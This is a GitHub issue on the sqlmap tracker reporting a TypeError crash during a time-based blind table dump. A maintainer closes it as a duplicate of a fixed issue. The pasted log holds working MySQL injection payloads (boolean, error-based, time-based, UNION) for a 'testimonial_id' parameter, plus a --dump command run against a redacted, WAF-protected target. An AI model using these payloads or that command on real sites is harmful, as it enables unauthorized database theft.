### ISSUE TITLE
 [CRITICAL] unhandled exception occurred in sqlmap/1.0.9.41#dev

### ISSUE THREAD

**Issue by gavrochedz** [sqlmapproject/sqlmap#2255] opened 2016-10-28 22:57 UTC
* Installation method  `zip`
* Client OS ( `Microsoft Windows 7`)
* Detected WAF/IDS/IPS protection (`unknown`):

----------------------------------------------------------------------------------------------------------------
[00:01:32] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: testimonial_id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: testimonial_id=-1017 OR 7187=7187#

    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
    Payload: testimonial_id=-4753 OR 1 GROUP BY CONCAT(0x717a716271,(SELECT (CASE WHEN (5425=5425) THEN 1 ELSE 0 END)),0x717a717a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace
    Payload: testimonial_id=(CASE WHEN (7533=7533) THEN SLEEP(5) ELSE 7533 END)

    Type: UNION query
    Title: MySQL UNION query (random number) - 9 columns
    Payload: testimonial_id=-3547 UNION ALL SELECT 7700,7700,7700,CONCAT(0x717a716271,0x584f6d57526f4f454e7945664c49625847784e506b4d6c4e4643727879777a535073495056427679,0x717a717a71),7700,7700,7700,7700,7700#
---
[00:01:32] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[00:01:32] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.2.17

-------------------------------------------------------------------------------------------------------------

sqlmap version: 1.0.9.41#dev
Python version: 2.7.10
Operating system: Microsoft Windows 7

Command line: sqlmap.py -u ****************************************************************************** 
-D ****************** -T *********** --columns --random-agent --threads 5 --no-cast --dump

Technique: TIME
Back-end DBMS: MySQL (fingerprinted)
Traceback (most recent call last):
  File "sqlmap.py", line 149, in main
    start()
  File "lib/controller/controller.py", line 633, in start
    action()
  File "lib/controller/action.py", line 121, in action
    conf.dbmsHandler.dumpTable()
  File "plugins/generic/entries.py", line 334, in dumpTable
    value = NULL if column in emptyColumns else inject.getValue(query, union=False, error=False, dump=True)
  File "lib/request/inject.py", line 445, in getValue
    value = _goInferenceProxy(query, fromUser, batch, unpack, charsetType, firstChar, lastChar, dump)
  File "lib/request/inject.py", line 285, in _goInferenceProxy
    outputs = _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump)
  File "lib/request/inject.py", line 128, in _goInferenceFields
    output = _goInference(payload, expressionReplaced, charsetType, firstChar, lastChar, dump, field)
  File "lib/request/inject.py", line 100, in _goInference
    count, value = bisection(payload, expression, length, charsetType, firstChar, lastChar, dump)
  File "lib/techniques/blind/inference.py", line 593, in bisection
    val = getChar(index, asciiTbl)
  File "lib/techniques/blind/inference.py", line 369, in getChar
    if (timeBasedCompare or unexpectedCode) and not validateChar(idx, retVal):
  File "lib/techniques/blind/inference.py", line 217, in validateChar
    warnMsg = "detected HTTP code '%d' in validation phase is differing from expected '%d'" % (threadData.lastCode, kb.injection.data[kb.technique].trueCode)
TypeError: %d format: a number is required, not NoneType

[*] shutting down at 16:24:10

**Comment by stamparm** [comment] 2016-10-28 23:16
Duplicate of #2192 (fixed)

**Closed by stamparm** 2016-10-28 23:16 UTC

**Comment by gavrochedz** [comment] 2016-10-28 23:23
whay fixed ?

**Comment by gavrochedz** [comment] 2016-10-28 23:24
Ok thanks
